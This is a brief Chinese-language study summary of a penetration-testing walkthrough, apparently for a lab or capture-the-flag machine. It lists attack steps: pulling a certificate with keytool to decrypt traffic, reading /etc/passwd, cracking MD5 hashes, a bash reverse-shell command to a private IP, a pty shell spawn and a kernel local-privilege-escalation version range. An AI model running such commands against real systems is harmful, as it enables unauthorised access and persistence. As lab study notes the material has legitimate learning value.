教程网址
https://www.freebuf.com/articles/system/171318.html
学习经验总结
1.使用jre的bin目录下的keytool命令来输入秘钥库口令进而获取证书文件
2.将证书文件导入wireshark中,注意ip和端口
3.数据包http basic认证
4.使用cat /etc/passwd查看用户 /etc/passwd文件格式
5.漏洞查询库www.exploit-db.com(建议使用外网)
6.免费的md5解密网站 https://www.somd5.com/
7.若马经常被删除,可以建立反弹连接
echo "bash -i >& /dev/tcp/192.168.110.220/4444 0>&1" | bash
8.提权 python -c 'import pty;pty.spawn("/bin/bash")' (目的是可以使用su命令)
9.查看系统内核版本 uname -a和cat /etc/issue
存在本地提权漏洞内核版本是:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)
10.kali的strings命令
11.cat .bash_history查看历史命令
12.使用exiftool工具查看bill.png图片的exif信息
13.sudo -l查看用户执行脚本权限